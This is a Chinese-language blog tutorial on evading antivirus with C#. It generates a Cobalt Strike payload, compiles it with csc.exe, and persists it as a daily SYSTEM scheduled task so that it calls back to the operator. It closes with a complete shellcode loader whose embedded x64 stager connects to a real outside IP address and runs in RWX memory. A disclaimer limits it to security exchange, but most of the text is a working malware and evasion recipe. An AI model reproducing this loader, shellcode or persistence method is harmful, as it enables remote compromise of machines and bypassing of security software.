第六章-9 使用C#进行免杀

零、说明

1.说明

本文所有内容仅仅用于信息安全方面技术交流,

请读者切勿用于其他用途!!!

2.免杀的思路与技巧

主要是学习思路,至于方法。随着各大安全厂商的更新,

基本过一段时间就会失效。

一、启动CS

二、创建监听

在这里插入图片描述

三、创建payload

在这里插入图片描述
在这里插入图片描述
这里的语言我们选择C#。
在这里插入图片描述

四、将生成的payload放到利用模板

在这里插入图片描述
在这里插入图片描述
注意替换一下我们的名称,buf—shellcode

五、将CS文件转换为可执行的exe文件

1.说明

需要.net环境,一般服务器上都会装。

Win10安装,参考:https://blog.csdn.net/SR02020/article/details/105357669。

一般在这个位置:“ C:\Windows\Microsoft.NET\Framework64\v4.0.30319 ”

2.说说csc的使用

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
生成的exe文件和 “ csc.exe ” 在同一文件夹下。
在这里插入图片描述
看到, 已经过了静态查杀。

3.新的问题:

出现一个问题,就是我们执行此文件的时候。

他的进程会一直挂起,很容易被发现。

所以我们可以使用schtasks定时任务,让木马每天固定X点将shell反弹给我们。

参考官方文档:

https://docs.microsoft.com/en-us/windows/desktop/TaskSchd/schtasks 

六、定时任务

0.schtasks(schdule task:计划任务)

schtasks /create /RL HIGHEST /F /RU “SYSTEM” /TN “WindowsS” /TR “C:/test/test1.exe” /SC DAILY /MO 1 /ST 00:00


/RL:设置任务的运行级别。有效值为LIMITED(低)和HIGHEST(高)。默认为LIMITED。

/F:如果指定的任务已存在,则强制创建任务并禁止警告的值。

/RU:指定运行任务的用户上下文。

/TN:指定唯一标识计划任务的名称。

/TR:指定要在计划的时间运行的任务的路径和文件名。

/SC:指定计划频率,DAILY为每天。

/MO:对于MINUTE,HOURLY,DAILY,WEEKLY有效,可选参数,默认为1.

/ST:指定运行任务的开始时间,格式为HH:mm(24小时制)。

1.创建一个定时任务

在这里插入图片描述

2.查询一下创建的定时任务

在这里插入图片描述

3.我们让木马立即运行试试

我们发现火绒直接弹窗报毒,但是360杀毒与卫士是没有什么反应的。
在这里插入图片描述
先选择 “ 信任 ”。

4.在次查看运行状态

在这里插入图片描述

七、查看CS的结果

在这里插入图片描述
因为我们创建任务是system创建的,所以权限直接是system,也不用后续的提权操作了。

最后我们删除计划任务,
在这里插入图片描述

可以看出在某些方面火绒的效果还是不错,

其原因大概是每家厂商的规则库不同。

这也是有时候做免杀要生成好几套不同的payload的原因。

1.备注:

模板文件:“ shellcodeLauncher.exe “

using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using System.Runtime.InteropServices;

namespace ShellCodeLauncher
{
    class Program
    {
        static void Main()
        {

        byte[] shellcode = new byte[612] {
		0xfc, 0x48, 0x83, 0xe4, 0xf0, 0xe8, 0xc8, 0x00, 0x00, 0x00, 0x41, 0x51, 0x41, 0x50, 0x52, 0x51, 0x56, 0x48, 0x31, 0xd2, 0x65, 0x48, 0x8b, 0x52, 0x60, 0x48, 0x8b, 0x52, 0x18, 0x48, 0x8b, 0x52, 0x20, 0x48, 0x8b, 0x72, 0x50, 0x48, 0x0f, 0xb7, 0x4a, 0x4a, 0x4d, 0x31, 0xc9, 0x48, 0x31, 0xc0, 0xac, 0x3c, 0x61, 0x7c, 0x02, 0x2c, 0x20, 0x41, 0xc1, 0xc9, 0x0d, 0x41, 0x01, 0xc1, 0xe2, 0xed, 0x52, 0x41, 0x51, 0x48, 0x8b, 0x52, 0x20, 0x8b, 0x42, 0x3c, 0x48, 0x01, 0xd0, 0x66, 0x81, 0x78, 0x18, 0x0b, 0x02, 0x75, 0x72, 0x8b, 0x80, 0x88, 0x00, 0x00, 0x00, 0x48, 0x85, 0xc0, 0x74, 0x67, 0x48, 0x01, 0xd0, 0x50, 0x8b, 0x48, 0x18, 0x44, 0x8b, 0x40, 0x20, 0x49, 0x01, 0xd0, 0xe3, 0x56, 0x48, 0xff, 0xc9, 0x41, 0x8b, 0x34, 0x88, 0x48, 0x01, 0xd6, 0x4d, 0x31, 0xc9, 0x48, 0x31, 0xc0, 0xac, 0x41, 0xc1, 0xc9, 0x0d, 0x41, 0x01, 0xc1, 0x38, 0xe0, 0x75, 0xf1, 0x4c, 0x03, 0x4c, 0x24, 0x08, 0x45, 0x39, 0xd1, 0x75, 0xd8, 0x58, 0x44, 0x8b, 0x40, 0x24, 0x49, 0x01, 0xd0, 0x66, 0x41, 0x8b, 0x0c, 0x48, 0x44, 0x8b, 0x40, 0x1c, 0x49, 0x01, 0xd0, 0x41, 0x8b, 0x04, 0x88, 0x48, 0x01, 0xd0, 0x41, 0x58, 0x41, 0x58, 0x5e, 0x59, 0x5a, 0x41, 0x58, 0x41, 0x59, 0x41, 0x5a, 0x48, 0x83, 0xec, 0x20, 0x41, 0x52, 0xff, 0xe0, 0x58, 0x41, 0x59, 0x5a, 0x48, 0x8b, 0x12, 0xe9, 0x4f, 0xff, 0xff, 0xff, 0x5d, 0x6a, 0x00, 0x49, 0xbe, 0x77, 0x69, 0x6e, 0x69, 0x6e, 0x65, 0x74, 0x00, 0x41, 0x56, 0x49, 0x89, 0xe6, 0x4c, 0x89, 0xf1, 0x41, 0xba, 0x4c, 0x77, 0x26, 0x07, 0xff, 0xd5, 0xe8, 0x80, 0x00, 0x00, 0x00, 0x4d, 0x6f, 0x7a, 0x69, 0x6c, 0x6c, 0x61, 0x2f, 0x35, 0x2e, 0x30, 0x20, 0x28, 0x63, 0x6f, 0x6d, 0x70, 0x61, 0x74, 0x69, 0x62, 0x6c, 0x65, 0x3b, 0x20, 0x4d, 0x53, 0x49, 0x45, 0x20, 0x38, 0x2e, 0x30, 0x3b, 0x20, 0x57, 0x69, 0x6e, 0x64, 0x6f, 0x77, 0x73, 0x20, 0x4e, 0x54, 0x20, 0x36, 0x2e, 0x31, 0x3b, 0x20, 0x54, 0x72, 0x69, 0x64, 0x65, 0x6e, 0x74, 0x2f, 0x35, 0x2e, 0x30, 0x29, 0x00, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x00, 0x59, 0x48, 0x31, 0xd2, 0x4d, 0x31, 0xc0, 0x4d, 0x31, 0xc9, 0x41, 0x50, 0x41, 0x50, 0x41, 0xba, 0x3a, 0x56, 0x79, 0xa7, 0xff, 0xd5, 0xeb, 0x61, 0x5a, 0x48, 0x89, 0xc1, 0x41, 0xb8, 0x50, 0x00, 0x00, 0x00, 0x4d, 0x31, 0xc9, 0x41, 0x51, 0x41, 0x51, 0x6a, 0x03, 0x41, 0x51, 0x41, 0xba, 0x57, 0x89, 0x9f, 0xc6, 0xff, 0xd5, 0xeb, 0x44, 0x48, 0x89, 0xc1, 0x48, 0x31, 0xd2, 0x41, 0x58, 0x4d, 0x31, 0xc9, 0x52, 0x68, 0x00, 0x02, 0x60, 0x84, 0x52, 0x52, 0x41, 0xba, 0xeb, 0x55, 0x2e, 0x3b, 0xff, 0xd5, 0x48, 0x89, 0xc6, 0x6a, 0x0a, 0x5f, 0x48, 0x89, 0xf1, 0x48, 0x31, 0xd2, 0x4d, 0x31, 0xc0, 0x4d, 0x31, 0xc9, 0x52, 0x52, 0x41, 0xba, 0x2d, 0x06, 0x18, 0x7b, 0xff, 0xd5, 0x85, 0xc0, 0x75, 0x1d, 0x48, 0xff, 0xcf, 0x74, 0x10, 0xeb, 0xdf, 0xeb, 0x63, 0xe8, 0xb7, 0xff, 0xff, 0xff, 0x2f, 0x52, 0x73, 0x37, 0x61, 0x00, 0x00, 0x41, 0xbe, 0xf0, 0xb5, 0xa2, 0x56, 0xff, 0xd5, 0x48, 0x31, 0xc9, 0xba, 0x00, 0x00, 0x40, 0x00, 0x41, 0xb8, 0x00, 0x10, 0x00, 0x00, 0x41, 0xb9, 0x40, 0x00, 0x00, 0x00, 0x41, 0xba, 0x58, 0xa4, 0x53, 0xe5, 0xff, 0xd5, 0x48, 0x93, 0x53, 0x53, 0x48, 0x89, 0xe7, 0x48, 0x89, 0xf1, 0x48, 0x89, 0xda, 0x41, 0xb8, 0x00, 0x20, 0x00, 0x00, 0x49, 0x89, 0xf9, 0x41, 0xba, 0x12, 0x96, 0x89, 0xe2, 0xff, 0xd5, 0x48, 0x83, 0xc4, 0x20, 0x85, 0xc0, 0x74, 0xb6, 0x66, 0x8b, 0x07, 0x48, 0x01, 0xc3, 0x85, 0xc0, 0x75, 0xd7, 0x58, 0x58, 0xc3, 0xe8, 0x35, 0xff, 0xff, 0xff, 0x34, 0x35, 0x2e, 0x36, 0x33, 0x2e, 0x31, 0x32, 0x31, 0x2e, 0x35, 0x37, 0x00 };

        UInt32 funcAddr = VirtualAlloc(0, (UInt32)shellcode.Length,
                            MEM_COMMIT, PAGE_EXECUTE_READWRITE);
        Marshal.Copy(shellcode, 0, (IntPtr)(funcAddr), shellcode.Length);
        IntPtr hThread = IntPtr.Zero;
        UInt32 threadId = 0;

        IntPtr pinfo = IntPtr.Zero;

        hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId);
        WaitForSingleObject(hThread, 0xFFFFFFFF);
        return;
    }

    private static UInt32 MEM_COMMIT = 0x1000;

    private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;

    [DllImport("kernel32")]
    private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr,
         UInt32 size, UInt32 flAllocationType, UInt32 flProtect);


    [DllImport("kernel32")]
    private static extern IntPtr CreateThread(

      UInt32 lpThreadAttributes,
      UInt32 dwStackSize,
      UInt32 lpStartAddress,
      IntPtr param,
      UInt32 dwCreationFlags,
      ref UInt32 lpThreadId

      );

    [DllImport("kernel32")]
    private static extern UInt32 WaitForSingleObject(

      IntPtr hHandle,
      UInt32 dwMilliseconds
      );
}
}

猜你喜欢

转载自blog.csdn.net/weixin_43970718/article/details/110082356